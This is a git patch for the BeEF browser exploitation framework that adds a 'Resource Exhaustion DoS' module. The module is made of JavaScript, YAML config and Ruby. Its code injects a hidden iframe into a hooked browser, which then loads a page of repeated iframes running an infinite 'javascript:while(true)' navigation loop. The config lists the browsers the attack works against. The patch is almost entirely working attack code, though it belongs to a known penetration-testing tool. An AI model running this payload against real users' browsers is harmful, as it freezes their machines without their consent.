From 5903f026eabcf8985c926ffb6e3145888e4e5511 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Thu, 21 Jan 2016 08:09:13 +0000
Subject: [PATCH] Add Resource Exhaustion DoS module

---
 .../resource_exhaustion_dos/command.js        | 13 +++++++++++
 .../resource_exhaustion_dos/config.yaml       | 16 +++++++++++++
 .../resource_exhaustion_dos/module.rb         | 23 +++++++++++++++++++
 3 files changed, 52 insertions(+)
 create mode 100644 modules/exploits/resource_exhaustion_dos/command.js
 create mode 100644 modules/exploits/resource_exhaustion_dos/config.yaml
 create mode 100644 modules/exploits/resource_exhaustion_dos/module.rb

diff --git a/modules/exploits/resource_exhaustion_dos/command.js b/modules/exploits/resource_exhaustion_dos/command.js
new file mode 100644
index 000000000..3f685e98a
--- /dev/null
+++ b/modules/exploits/resource_exhaustion_dos/command.js
@@ -0,0 +1,13 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var resource_exhaustion_dos_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  var url = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/dos';
+  resource_exhaustion_dos_<%= @command_id %>.setAttribute('src', url);
+  beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
+});
+
diff --git a/modules/exploits/resource_exhaustion_dos/config.yaml b/modules/exploits/resource_exhaustion_dos/config.yaml
new file mode 100644
index 000000000..3a2f2a6b3
--- /dev/null
+++ b/modules/exploits/resource_exhaustion_dos/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        resource_exhaustion_dos:
+            enable: true
+            category: "Exploits"
+            name: "Resource Exhaustion DoS"
+            description: "This module attempts to exhaust system resources rendering the browser unusable."
+            authors: ["bcoles"]
+            target:
+                working: ["FF", "IE", "S"]
+                not_working: ["C"]
diff --git a/modules/exploits/resource_exhaustion_dos/module.rb b/modules/exploits/resource_exhaustion_dos/module.rb
new file mode 100644
index 000000000..5cc654d55
--- /dev/null
+++ b/modules/exploits/resource_exhaustion_dos/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Resource_exhaustion_dos < BeEF::Core::Command
+
+  def self.options
+    return []
+  end
+  def pre_send
+    src = %q{<iframe src="javascript:while(true) window.location='';">}
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw(
+      '200',
+      {'Content-Type' => 'text/html'},
+      src * (rand(10) + 10),
+      '/dos',
+      -1)
+  end
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end